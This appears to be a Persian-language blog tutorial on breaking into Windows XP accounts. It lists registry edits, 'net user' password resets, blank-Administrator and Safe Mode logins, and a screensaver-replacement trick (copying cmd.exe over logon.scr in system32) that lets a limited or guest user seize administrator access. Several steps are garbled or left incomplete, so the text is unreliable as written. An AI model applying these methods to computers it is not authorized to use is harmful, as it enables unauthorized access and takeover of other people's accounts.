نفوذ کردن به ویندوز XP
اگر account به صورت limited و guest نباشد راههای مختلفی برای عبور از رمز آن وجود دارد
1- می توانید از ریجستری ویندوز استفاده کنید:به کلید زیر بروید:
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccount\UserList
در قسمت راست داده هایی با نامهای VUSR_ و IUSR_IUSR_ برای administrator و VUSR_ برای یوزر های دیگر است وجود دارد آنها را پاک کرده و دوباره مانند قبل بسازید.با این کار هنگام عوض کردن پسورد دیگر پسورد قبلی(current password) ویندوز را از شما نمی خواهد و شما می توانیند پسورد جدید را وارد کنید.
2- روش دیگر برای ورود به Command prompt :
cmd = Run
بعد جمله زیر را تایپ کنید
Net User Username Newpasswors
به جای Username نام account خودتان و به جای Newpassword پسورد جدید را می نویسید حالا اینتر را بزنید.اگر چنین پیغامی آمد یعنی پسورد ویندوز عوض شده است:
The command completed successfully
نکته: اگر نام User تان را نمی دانید ، می توانید از داخل درایوی که ویندوز در آن نصب به پوشهDucuments and Setting بروید نام فولدرهایی که انجا می بینید نام User های شما است.
3- روش سوم این است که اگر Administrator ویندوز پسورد نداشته باشد وقتی منوی کاربران ظاهر می شود (همون صفحه Welcome) دو بار کلید های Ctrl+Alt+Del را فشار دهید و داخل کادری که ظاهر می شود در قسمت نام administrator را بنویسید و پسورد را خالی بگذارید و ok تا وارد یوزر administrator ویندوز شوید حالا می توانید با کمک روش 1 یا 2 پسورد یوزری را که فراموش کرده اید تغییر دهید
4- اگر administrator ویندوز هم پسورد داشت ناراحت نباشید می شود راحت پسورد آنرا هم شکست اما حالا باید ویندوز را در حالت Safe mode اجرا کنید.بدین صورت که قبل از بالا آمدن ویندوز کلید F8 را فشار دهید و بعد Safe mode را انتخاب کنید. در Run تایپ کنید
control userpassword2
پنجره ای باز می شود که دو تب Users و Advance را دارد User را انتخاب کنید و تیک گزینه
User must enter a username and password to usethiscomputer
را بردارید.با برداشتن تیک این گزینه دیگر وقت وارد شدن به ویندوز از شما پسورد نمی خواهد. حتی می توانید با استفاده ازadd و remove نام کاربری جدیدی درست کنید و یا کاربر قبلی را پاک کنید از گزینه properties هم می توانید برای تعیین میزان دسترسی کاربران به ویندوز استفاده کرد.
حالا اگر User شما از نوع Limited و guest هست ناراحت نباشید چون می شود با همین یوزر محدود هم administrator ویندوز را هک کنید!!!. در این روش برنامه Command prompt داس را بجای Screen Saver معرفی می کنید.
Command prompt را باز کنید و در آن دستورات زیر را اجرا کنید.
cd\
cd\windows\system32
mkdir hackpass
copy logon.scr hackpass \logon.scr
copy cmd.exe hackpass \cmd.exe
rename cmd.exe logon.scr
exit
دو سطر
دستور زير را type و اجرا کنيد:
net user username newpassword
username و newpassword هم که در روش ۲ آموزش دادم. بعد از پايان کار دو فايلی را که در آن پوشه hackpass کپی کرديد به جای اول که یعنی system32 است بر گردانید.
